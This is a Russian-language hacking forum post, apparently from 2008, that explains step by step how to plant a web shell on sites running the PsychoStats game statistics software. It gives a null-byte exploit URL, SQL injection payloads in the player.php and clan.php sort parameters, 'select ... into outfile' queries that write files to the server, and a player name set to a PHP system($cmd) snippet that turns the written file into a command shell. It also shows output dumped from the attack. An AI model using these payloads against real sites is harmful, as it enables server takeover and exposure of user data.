В этой теме нет ответов

[AFoST]

Здравствуйте, предлагаю Вашему вниманию статью про то, как залить шелл на сайт через игровую статистику PsychoStats.
Статья, по-существу, является описанием к ]]>видео]]> .
Главной проблемой в заливке шелла через эту игровую статистику является нахождение пути к папке с правами на запись.

Если Вы нашли сайт с такой статой и нашли полный путь к папке с определёнными правами, тогда вам повезло и можно залить шелл
И так, по шагам...
Сперва мне пришла в голову идея как-либо полезно воспользоваться паблик "сплойтом" для этой игровой статы...

http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00

Попробовал на локальном сайте, ввёл в броузерную строку сплойт и получил кучу ошибок, после чего стата больше не открывалась в принципе =\...Не зная в чем дело, попросил помощи в соответствующем разделе на ачате Правда, ответа так и не получил, зато мне дали толчок найти другие дыры(спасибо Scipio), собственноручно нашёл уже ранее найденные уязвимости в стате. Это были sql-inj после  "order by".

/player.php?id=1093&ssort=(-skill*1)&sorder=desc#plrsessions
/clan.php?id=3&psort=(-deaths*1)&porder=desc

Далее хочу сказать спасибо Noiro, он предложил использовать подзапросы в этих скулях, что я и сделал.

/player.php?id=1093&ssort=(-skill*(select 1))&sorder=desc#plrsessions
/clan.php?id=3&psort=(-deaths*(select 1))&porder=desc

На удивление, эти скули работали =\ После чего я решил попробовать записать запрос в файл на сервере...

/player.php?id=1093&ssort=(-skill*(select 1 into outfile '/path/file.txt'))&sorder=desc#plrsessions

Файл создался и в него было записано следующее...

1191849001	7405.11	4	1.00	2	50.00	0	0.00	0	0.00	593	53	11	13.25	20.75	0	20
1191852522	7283.30	22	10	2.20	10	45.45	0	0.00	0	0.00	3262	261	77	11.86	29.50	1605
1191938597	7195.62	2	2	1.00	1	50.00	0	0.00	1	50.00	404	32	10	16.00	31.25	216
1192130752	7067.62	2	0	2	2	100.00	0	0.00	0	0.00	229	51	8	25.50	15.69	185
1192024974	7038.66	38	18	2.11	4	10.53	0	0.00	0	0.00	4999	289	85	7.61	29.41	1921

Это статистика некоторого пользователя с id=1093. Как видно записались одни цифры =( После этой неудачи я решил записать запрос в файл через другую скулю(а вдуг чего изменится!!!)...

/clan.php?id=3&psort=(-deaths*(select 1 into outfile 'd:/system/server/www/info/inet2/2.txt'))&porder=desc

Получил в файле такую лабуду...

1093	1093	2007-04-06	2007-09-30	21.24	11	8	72.73	36	90.00		167840198	\N [@_oFF_D]~TURIK.<awp>~									0	\N	\N
1105	1105	2007-04-26	2007-06-02	21.72	17	10	58.82	44	88.00		167840029	\N	[@_oFF_D]-=TURIK=-									0	\N	\N
23	23	2006-04-16	2007-12-16	19.32	37	22	59.46	426	88.02		167840133	\N	[@_oFF_D]_[@$PeR]						skull.gif

Помимо всякой чуши из циферок, в файле я нашёл имена мемберов клана с id=3(префикс которого=[@_oFF_D]). Потом мне пришло в голову , что если я состою в клане, то назвавшись, к примеру, "<? system($cmd) ?>", я залью это в файл и получу шелл!!! Благо на имена пользователей в этой стате никаких ограничений не стоит и я так и сделал. Шелл залился, всё прошло замечательно!

С наилучшими пожеланиями, FoST 8(тире)794(тире)038
(с) FoST
08.01.2008, 23:00

Статья впервые опубликована на ачате часом раньше